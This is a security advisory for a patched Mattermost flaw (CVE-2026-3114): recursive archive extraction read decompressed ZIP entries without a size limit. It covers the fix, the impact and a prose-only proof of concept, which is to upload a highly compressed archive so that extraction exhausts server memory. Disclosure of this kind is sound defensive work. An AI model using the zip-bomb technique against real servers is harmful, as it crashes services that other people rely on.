Status: Patched
This vulnerability has been verified as resolved and deployed.
Zip bomb memory exhaustion in recursive document extraction (CVE-2026-3114)
Summary
Archive extraction limited compressed upload size but not decompressed entry size
Mattermost enforces FileSettings.MaxFileSize on uploaded files, but the document extraction service previously did not apply that same limit to each decompressed archive entry. When file-content extraction and archive recursion were enabled, archiveExtractor.Extract mounted an uploaded archive, walked entries with fs.WalkDir, opened each entry, and called io.ReadAll(file) before handing the decompressed bytes to sub-extractors. A small compressed archive could therefore expand into very large in-memory entry data and exhaust server memory during content extraction.
The fix threads MaxFileSize through docextractor.ExtractSettings and the Extractor interface, passes the configured file-size limit from App.ExtractContentFromFileInfo, and wraps archive entry readers with utils.NewLimitedReaderWithError before io.ReadAll. The original fix is PR #35200 / commit b947f1c38a675688c5fc9ade696d0f0f2bad430a; backports include #35220, #35279, and #35282.
CVSS Score
Vulnerability Location
Source-to-Sink Analysis
When file content extraction is enabled, uploaded file metadata can trigger ExtractContentFromFileInfo immediately after storage. The extract-content job can also process stored files later.
The patched app layer now passes both ArchiveRecursion and the configured MaxFileSize into the document extractor.
When archive recursion is enabled, the archive extractor is configured with a sub-extractor chain and receives the MaxFileSize value through the shared extractor interface.
Before the fix, each archive entry was read with an unbounded io.ReadAll(file). The patched code wraps the entry in a limited reader before reading decompressed bytes into memory.
Impact Analysis
Critical Impact
A small authenticated upload can cause disproportionate server memory allocation during content extraction. Repeated uploads or a sufficiently large decompressed entry can exhaust memory, destabilize extraction workers, and degrade or crash the Mattermost process.
Attack Surface
Mattermost servers with file uploads enabled and file-content extraction configured. The decompressed-entry risk specifically depends on recursive archive extraction (FileSettings.ArchiveRecursion) because sub-extraction reads archive entries into memory.
Preconditions
The attacker needs an account or integration capable of uploading files to a channel where the server will process the file for text extraction. The compressed archive must fit within the configured upload size limit while expanding to very large entry data.
Proof of Concept
Environment Setup
Use a vulnerable build before PR #35200 with FileSettings.ExtractContent enabled and FileSettings.ArchiveRecursion enabled. Keep FileSettings.MaxFileSize at a normal value such as 100 MB.
Target Configuration
The vulnerable path is the document extraction service, not the upload size check. The archive itself must be accepted by upload limits while containing an entry that decompresses to a much larger size.
Exploit Delivery
Upload a crafted ZIP archive with a highly compressed large text entry. The server stores the uploaded file and invokes extraction either immediately or through the extract-content job.
Outcome
The patch turns decompressed-entry overrun into a bounded extraction error instead of unbounded memory growth.
Expected Response:
On vulnerable builds, extraction attempts to allocate the full decompressed entry via io.ReadAll(file). On fixed builds, reading the entry fails once the configured max file size is exceeded.
